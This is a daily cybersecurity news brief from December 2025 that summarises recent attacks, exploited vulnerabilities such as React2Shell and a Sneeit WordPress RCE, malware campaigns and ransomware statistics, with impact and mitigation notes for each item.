Svoboda Cybersecurity Brief December 09, 2025

Leavenworth, Kansas Cyberattack Disrupts City Services

A cyberattack on Leavenworth, Kansas, disrupted city services including invoicing, permitting, and hiring systems since November 19. Emergency services remain unaffected, and no ransomware group has claimed responsibility.
Source: DataBreaches.net

Malicious VSCode Extensions Drop Infostealers

Two malicious VSCode extensions, Bitcoin Black and Codo AI, were found on Microsoft’s marketplace, delivering infostealers that steal credentials, crypto wallets, and hijack browser sessions. The malware uses DLL hijacking and hides activity in %APPDATA%\Local\Evelyn.
Impact: Data theft, session hijacking, and system compromise.
Mitigation: Install extensions only from reputable publishers and monitor for unusual PowerShell/batch script activity.
Source: BleepingComputer

Ransomware Gangs Extorted Over $2.1B from 2022-2024

FinCEN reports ransomware payments peaked in 2023 ($1.1B) but dropped in 2024 ($734M) after law enforcement disrupted ALPHV/BlackCat and LockBit. Top targeted industries: financial services, healthcare, and manufacturing.
Source: BleepingComputer

Poland Arrests Ukrainians with Advanced Hacking Gear

Three Ukrainians were arrested in Poland for allegedly attempting to damage IT systems using Flipper Zero and K19 RF/GS detection tools. They face charges for fraud and possessing devices for criminal activity.
Source: BleepingComputer

Google Chrome Adds Security Layer for Gemini AI Browsing

Google introduced User Alignment Critic, a secondary LLM model, to prevent indirect prompt injection attacks in Chrome’s agentic AI features. It isolates untrusted content and enforces origin-based restrictions.
Impact: Prevents AI-driven data exfiltration and unauthorized actions.
Mitigation: Enable Chrome auto-updates and monitor for Gemini AI behavior anomalies.
Source: BleepingComputer

JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Sites

A campaign using obfuscated JavaScript loaders and HTML Applications (HTA) delivers NetSupport RAT, enabling full system control. Targets enterprise users through compromised websites.
Impact: Remote access, data theft, and system compromise.
Mitigation: Enforce CSP, monitor PowerShell/mshta.exe usage, and restrict script execution.
Source: The Hacker News

React2Shell (CVE-2025-55182) Exploitation Surges

Critical RCE vulnerability in React Server Components (RSC) is actively exploited, with over 77,000 vulnerable IPs detected. Attackers deploy cryptominers, Sliver C2, and steal AWS credentials.
Impact: Remote code execution, credential theft, and botnet enrollment.
Mitigation: Patch React to v19.0.1+ and disable RSC if unused.
Source: SecurityWeek

Sneeit WordPress Plugin RCE (CVE-2025-6389) Exploited

A flaw in the Sneeit Framework plugin allows unauthenticated RCE via call_user_func(). Attackers create admin accounts and upload backdoors like tijtewmg.php.
Impact: Full site takeover and malware distribution.
Mitigation: Update to Sneeit v8.4+ and audit admin users.
Source: The Hacker News

MuddyWater Deploys UDPGangster Backdoor in Targeted Campaigns

The Iranian group MuddyWater uses spear-phishing with malicious Word docs to deploy UDPGangster, a UDP-based backdoor targeting Turkey, Israel, and Azerbaijan.
Impact: Remote control, data exfiltration, and payload delivery.
Mitigation: Disable macros, monitor UDP traffic, and enforce email filtering.
Source: The Hacker News

Apache Tika XXE Injection (CVE-2025-66516)

Critical flaw in Apache Tika allows XXE injection via crafted XFA files in PDFs, risking data leaks or RCE. Patched in versions 3.2.2 (tika-core) and 2.0.0 (tika-parsers).
Impact: Data exfiltration, SSRF, or system compromise.
Mitigation: Update affected modules and sanitize PDF inputs.
Source: SecurityWeek

Share this brief: https://svo.bz/sanj